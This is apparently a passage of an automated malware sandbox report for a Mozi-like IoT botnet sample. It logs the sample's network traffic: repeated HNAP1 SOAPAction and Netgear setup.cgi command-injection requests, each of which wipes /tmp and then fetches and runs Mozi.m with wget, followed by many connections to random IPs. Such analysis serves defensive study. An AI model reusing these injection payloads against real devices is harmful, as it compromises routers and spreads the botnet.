                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 220.130.214.100:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 3.11.29.16:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: /tmp/rIbyGX66Op (PID: 4601)Socket: 0.0.0.0::54753
                Source: unknownTCP traffic detected without corresponding DNS query: 178.40.184.137
                Source: unknownTCP traffic detected without corresponding DNS query: 140.39.206.54
                Source: unknownTCP traffic detected without corresponding DNS query: 34.8.155.116
                Source: unknownTCP traffic detected without corresponding DNS query: 108.184.4.136
                Source: unknownTCP traffic detected without corresponding DNS query: 221.160.8.201
                Source: unknownTCP traffic detected without corresponding DNS query: 108.39.69.131
                Source: unknownTCP traffic detected without corresponding DNS query: 3.51.62.125
                Source: unknownTCP traffic detected without corresponding DNS query: 67.118.131.139
                Source: unknownTCP traffic detected without corresponding DNS query: 28.86.70.243
                Source: unknownTCP traffic detected without corresponding DNS query: 89.235.62.86
                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.82.42
                Source: unknownTCP traffic detected without corresponding DNS query: 171.112.221.128
                Source: unknownTCP traffic detected without corresponding DNS query: 85.117.188.205
                Source: unknownTCP traffic detected without corresponding DNS query: 105.109.18.186
                Source: unknownTCP traffic detected without corresponding DNS query: 29.5.215.81
                Source: unknownTCP traffic detected without corresponding DNS query: 8.114.30.17
                Source: unknownTCP traffic detected without corresponding DNS query: 19.112.11.89
                Source: unknownTCP traffic detected without corresponding DNS query: 4.186.238.93
                Source: unknownTCP traffic detected without corresponding DNS query: 85.124.222.42
                Source: unknownTCP traffic detected without corresponding DNS query: 212.9.178.122
                Source: unknownTCP traffic detected without corresponding DNS query: 123.152.1.95
                Source: unknownTCP traffic detected without corresponding DNS query: 13.229.32.133
                Source: unknownTCP traffic detected without corresponding DNS query: 138.94.203.237
                Source: unknownTCP traffic detected without corresponding DNS query: 132.84.208.189
                Source: unknownTCP traffic detected without corresponding DNS query: 84.219.17.176
                Source: unknownTCP traffic detected without corresponding DNS query: 165.94.66.173
                Source: unknownTCP traffic detected without corresponding DNS query: 116.56.146.125
                Source: unknownTCP traffic detected without corresponding DNS query: 163.60.176.218
                Source: unknownTCP traffic detected without corresponding DNS query: 174.9.64.0
                Source: unknownTCP traffic detected without corresponding DNS query: 217.196.154.24
                Source: unknownTCP traffic detected without corresponding DNS query: 43.162.206.133
                Source: unknownTCP traffic detected without corresponding DNS query: 197.46.69.196
                Source: unknownTCP traffic detected without corresponding DNS query: 79.58.62.70
                Source: unknownTCP traffic detected without corresponding DNS query: 180.195.241.242
                Source: unknownTCP traffic detected without corresponding DNS query: 113.203.125.76
                Source: unknownTCP traffic detected without corresponding DNS query: 190.166.22.140
                Source: unknownTCP traffic detected without corresponding DNS query: 124.94.21.94
                Source: unknownTCP traffic detected without corresponding DNS query: 18.184.123.158
                Source: unknownTCP traffic detected without corresponding DNS query: 125.178.212.248
                Source: unknownTCP traffic detected without corresponding DNS query: 181.215.101.174
                Source: unknownTCP traffic detected without corresponding DNS query: 146.97.112.184
                Source: unknownTCP traffic detected without corresponding DNS query: 179.8.250.180
                Source: unknownTCP traffic detected without corresponding DNS query: 5.71.214.240
                Source: unknownTCP traffic detected without corresponding DNS query: 113.237.9.87
                Source: unknownTCP traffic detected without corresponding DNS query: 182.151.134.212
                Source: unknownTCP traffic detected without corresponding DNS query: 75.104.12.143
                Source: unknownTCP traffic detected without corresponding DNS query: 65.192.2.39
                Source: unknownTCP traffic detected without corresponding DNS query: 83.106.49.27
                Source: unknownTCP traffic detected without corresponding DNS query: 100.221.5.250
                Source: unknownTCP traffic detected without corresponding DNS query: 74.164.3.48
